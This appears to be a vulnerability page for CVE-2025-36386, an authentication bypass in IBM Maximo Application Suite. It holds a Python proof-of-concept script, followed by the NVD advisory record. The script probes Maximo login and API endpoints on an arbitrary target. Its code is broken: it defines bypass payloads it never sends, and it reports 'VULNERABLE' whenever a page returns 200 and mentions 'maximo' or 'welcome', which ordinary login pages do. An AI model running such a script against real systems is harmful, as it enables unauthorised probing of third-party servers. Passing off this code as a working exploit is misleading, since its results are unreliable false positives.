CVE-2025-36386

import requests import sys # CVE-2025-36386 PoC - IBM Maximo Authentication Bypass # Target: IBM Maximo Application Suite < 9.0.16 / < 9.1.5 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-36386 Authentication bypass in IBM Maximo Application Suite """ endpoints = [ '/maximo/ui/login', '/maximo/api/login', '/meaweb/login', '/maximo/api/mobile/v1/session', '/maximo/oslc/af/selectcatalog', ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/json', } # Try to bypass authentication with crafted request bypass_payloads = [ {'authenticated': 'true', 'userName': 'maxadmin'}, {'j_sessionid': 'null'}, {'Authorization': 'Bearer null'}, ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) # Check for successful authentication bypass indicators if response.status_code == 200 and any(x in response.text.lower() for x in ['maximo', 'dashboard', 'welcome']): return True, url except requests.RequestException: continue return False, None if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-36386.py <target_url>') sys.exit(1) target = sys.argv[1] vulnerable, access_point = check_vulnerability(target) if vulnerable: print(f'[+] Target is VULNERABLE to CVE-2025-36386') print(f'[+] Authentication bypass possible at: {access_point}') else: print('[-] Target does not appear to be vulnerable')

{"cve": {"id": "CVE-2025-36386", "sourceIdentifier": "[email protected]", "published": "2025-10-28T16:15:38.107", "lastModified": "2025-11-21T14:10:18.257", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Maximo Application Suite 9.0.0 through 9.0.15 and 9.1.0 through 9.1.4 could allow a remote attacker to bypass authentication mechanisms and gain unauthorized access to the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-305"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:maximo_application_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0", "versionEndIncluding": "9.0.15", "matchCriteriaId": "4DF88C5A-C790-4F97-8672-A23C38D6B798"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:maximo_application_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.1.0", "versionEndIncluding": "9.1.4", "matchCriteriaId": "184F8AEA-D1BE-431E-9139-06787DA73A89"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7249416", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}